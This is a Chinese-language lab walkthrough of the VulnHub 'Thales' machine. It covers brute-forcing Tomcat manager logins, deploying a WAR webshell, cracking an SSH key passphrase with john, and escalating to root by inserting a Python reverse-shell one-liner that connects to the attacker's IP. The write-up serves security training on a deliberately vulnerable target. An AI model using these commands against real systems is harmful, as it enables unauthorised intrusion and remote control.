VulnHub靶场Thales

靶场地址https://www.vulnhub.com/entry/thales-1,749/

配置:

kali虚拟机有两个网卡,一个是仅主机模式,一个是NAT模式,应为校园网原因不能使用桥接模式

靶机一个网卡仅主机模式

靶机发现

攻击机:192.168.56.104

靶机:192.168.56.108

VulnHub靶场Thales_第1张图片

信息收集

VulnHub靶场Thales_第2张图片22/tcp ssh

8080/tcp http

Apache Tomcat 9.0.52

漏洞发现

从Tomcat 9.0.52入手

VulnHub靶场Thales_第3张图片

传递参数name:admin password:12356

VulnHub靶场Thales_第4张图片

简单的base64加密,放到爆破模块看看存不存在弱口令

VulnHub靶场Thales_第5张图片

VulnHub靶场Thales_第6张图片

VulnHub靶场Thales_第7张图片

base64编码

VulnHub靶场Thales_第8张图片

去掉这个勾,免得对我们的payload编码

VulnHub靶场Thales_第9张图片

开始爆破

VulnHub靶场Thales_第10张图片

要等好久,我就换了msf

VulnHub靶场Thales_第11张图片

VulnHub靶场Thales_第12张图片

VulnHub靶场Thales_第13张图片

VulnHub靶场Thales_第14张图片

跑了一遍没有出来,发现没有tomcat用户名,然后我就自己创建了个字典加进去,就出来了。

密码是role1

VulnHub靶场Thales_第15张图片

登陆进后台了

VulnHub靶场Thales_第16张图片

漏洞利用

可以部署war包

VulnHub靶场Thales_第17张图片

尝试了weevely工具生成木马上传,发现是404。

VulnHub靶场Thales_第18张图片

VulnHub靶场Thales_第19张图片后来我用哥斯拉生成了一个木马,上传连接的时候,发现我傻B了,木马路径是war包名/文件名

OK连接成功

VulnHub靶场Thales_第20张图片

也可以利用msfvenom,后面直接反弹shell,更加稳定。VulnHub靶场Thales_第21张图片

切换反弹shell

注意python版本

python3 -c 'import pty; pty.spawn("/bin/bash")'

export TERM=xterm

VulnHub靶场Thales_第22张图片

Ctrl+Z

stty -a

VulnHub靶场Thales_第23张图片

stty raw -echo;fg

reset

VulnHub靶场Thales_第24张图片

stty rows26 columns 126

提权

VulnHub靶场Thales_第25张图片

user.txt没有权限查看,应该是一个flag,有个ssh文件,下载id_rsa

通过ssh2john转换为可以识别的信息,破解密码

python3 /usr/share/john/ssh2john.py id_rsa >crack.txt

john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt

VulnHub靶场Thales_第26张图片

VulnHub靶场Thales_第27张图片

VulnHub靶场Thales_第28张图片

有个脚本文件,属主是root,可以用来提权

VulnHub靶场Thales_第29张图片

VulnHub靶场Thales_第30张图片

这个脚本代码是看大佬写的

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.56.104",6666));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

VulnHub靶场Thales_第31张图片

你可能感兴趣的:(打靶日记,网络,linux,运维)